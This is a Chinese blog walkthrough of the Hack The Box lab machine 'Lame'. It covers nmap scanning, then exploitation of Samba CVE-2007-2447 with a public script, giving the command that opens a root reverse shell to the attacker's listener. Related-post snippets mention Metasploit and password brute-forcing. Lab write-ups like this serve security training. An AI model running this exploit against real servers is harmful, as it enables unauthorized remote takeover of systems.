Hack The Box::Lame

已于 2022-10-10 13:48:26 修改
阅读量347 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全 web安全
于 2022-10-10 13:42:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127243007
版权

0x00 信息收集

nmap -Pn -sV -T 4 -A 10.10.10.3

21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.92
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| vulners:
|   cpe:/a:openbsd:openssh:4.7p1:
|       CVE-2010-4478   7.5     https://vulners.com/cve/CVE-2010-4478
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       CVE-2016-10708  5.0     https://vulners.com/cve/CVE-2016-10708
|       CVE-2010-4755   4.0     https://vulners.com/cve/CVE-2010-4755
|_      CVE-2008-5161   2.6     https://vulners.com/cve/CVE-2008-5161
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

共四个端口且都是与服务有关,因此尝试从这些服务入手。

0x01 漏洞利用

ftp服务允许匿名登录,但是登录进去后未发现任何文件。
经搜索 vsftp 2.3.4 有 Backdoor Command Execution,通过msf执行,创建session失败。
22端口的ssh服务未发现可以利用的漏洞。
唯一可以利用的就只剩下samba服务,搜索有关samba 3的相关漏洞。
https://github.com/amriunix/CVE-2007-2447
利用github中的脚本,成功反弹shell,并是管理员权限。

pip install pysmb
python usermap_script.py 10.10.10.3 445 10.10.16.92 4444

在这里插入图片描述

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Lame:Lame-iOS 打包
07-02
1.fat-lame下是合并后后的静态库文件,支持 arm64、armv7、armv7s、i386、x86_64 2.thin-lame下是每个指令生成的静态文件 #####打包生成静态库 1.下载Lamemp3 源码地址: 2.修改lamemp3.sh文件 SOURCE是下载lame源码...
LaMe:Mabinogi 发射器
07-04
LaMe:Mabinogi 发射器》是一款基于C#编程语言开发的应用程序,主要用于Mabinogi游戏的辅助启动和管理。Mabinogi是一款韩国开发的大型多人在线角色扮演游戏(MMORPG),以其丰富的音乐、自由度极高的职业系统和生活...
Hack the box靶机 Lame
菜浪马废的博客
05-06 461
以为FTP会有东西呢 发现啥也没有 找一下samba 有漏洞 我看4.3的评分 可能会难 没想到啊没想到 这么简单 ****要是考试也这么简单就好了
Hack The Box】linux练习-- Lame
人间体佐菲的博客
11-07 182
Hack The Box】linux练习-- Lame
HackTheBox-Machines--Lame
七天
05-28 318
枚举共享驱动器,并查看权限,发现/tmp目录具有读取和写入权限。使用hydra、medusa等工具进行暴力破解。
HACKTHEBOX --Lame
renielnxy的博客
05-11 213
这个就是简单的靶机,里面存在着很多经典的内容,建议大家刚开始学渗透的时候多去动手试试。
Hackthebox walkthrough-Lame(考点:SMB利用)
冬萍子癸水
03-26 368
Hackthebox walkthrough-Lame NMAP扫起。 可以看到端口开放smb 3.0.20 DB里面搜到了。可以用MSF。如果因为OSCP而不想用MSF,就进一步搜CVE(已标明是CVE-2007-2447) 在github里找到按提示的步骤来,py脚本搞起,然后本机接收,很简单了。 ...
Slime:Lame2D的技术演示
02-06
《Slime:Lame2D技术演示》是基于Lame2D引擎开发的一款游戏,它展示了该引擎在2D像素艺术(Pixel Art)游戏开发中的应用。Lame2D是一款轻量级的游戏开发框架,专注于2D游戏制作,提供了一系列方便开发者使用的功能,...
lame:完全完整的高级Haskell绑定到LAME编码器
03-07
Haskell的LAME 这是对的相当完整的高级Haskell绑定。 提供的功能 快速的MP3编码器可以在各种模式下工作(您指定压缩率,所需的比特率或VBR参数),并且有许多有趣的选项可以进行调整。 设置所有通用标签,包括图片...
word源码java-lame:瘸
06-05
lame_open_vdb ( const char * vlibf); EXTERN_C void lame_close_vdb ( void * vdb); EXTERN_C void * lame_create ( void * vdb); EXTERN_C void lame_destroy ( void * lame); EXTERN_C void * lame_fork ( void ...
hack the box lame靶机
zr1213159840的博客
04-13 613
首先打开靶机,给了提示,说是cve-2007-2447,搜索这个漏洞编号后,发现是一个samba漏洞,名字叫usermap_script 使用nmap扫描一下看看,能发现确实是存在samba的。 nmap -sV -Pn -A 10.10.10.3 打开msf,然后搜索usermap_script search usermap_script 然后使用第一个exploit use 0 查看一下需要设置哪些东西 options 将远程地址设置为10.10.10.3,远程的端口设置为445(才开
Hack The Box靶场练习之Lame
qq_44767905的博客
01-31 637
HTB-----Lame
HackTheBox-Lame&Jerry渗透测试
weixin_43111940的博客
04-13 207
Lame 端口扫描 sudo nmap -sC -sV -p 21,22,139,445,3632 10.10.10.3 发现了ftp和smb服务 匿名登录一下ftp 没有什么东西 查找smb服务的exp searchslpoit smb 这里可以用msf打 由于在OSCP的进攻方认证考试中只允许对一台主机用msf,所以在测试的时候尽量避免用msf(直接用msf很low) 用的是distccd的脚本,搜索distccd exploit 找到对应的脚本 https://gist.github.co
废物的靶场日记 hackthebox-lame+brainfuck
m0_53302733的博客
03-27 1554
废物的靶场日记 hackthebox-lame+brainfuck 之前都是做active的机器 为什么突然开始做简单的退役靶机了呢 因为打算过段时间去考个oscp 看到了一份htb上应该做的清单 就先一个个做下去吧 Lame easy难度 靶机IP 10.10.10.3 nmap -sV -A -Pn 10.10.10.3 好像是不能ping的 加个-Pn 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.
hack the box lame渗透过程
nini_boom的博客
05-12 1726
hack the box就不多介绍了。直接上题 1、信息收集 端口扫描 nmap -Pn -sV -sC -A -oN 10.10.10.3.txt 10.10.10.3 参数 作用 -Pn 如果主机禁用了ping请求,那么扫描将不能很好地进行下去。-Pn就是默认主机已经启动,并进行全套的检查工作 -sV 检查服务端的软件版本,可针对不同版本选择payload -sC...
Hackthebox------Jerry
大方子
11-24 3045
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
【HTB系列】靶机Mischief的渗透测试详解
大方子
01-06 3231
这次的目标靶机是 hackthebox的 Mischief IP地址:10.10.10.92 ====================================================================================== 首先我们用nmap对目标机器进行扫描 nmap -T4 -sV -p- 10.10.10.92 我们访...
极速下载!青苹果系统Win7旗舰版:稳定安全
最新发布
lihuiyun184291的博客
07-25 425
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值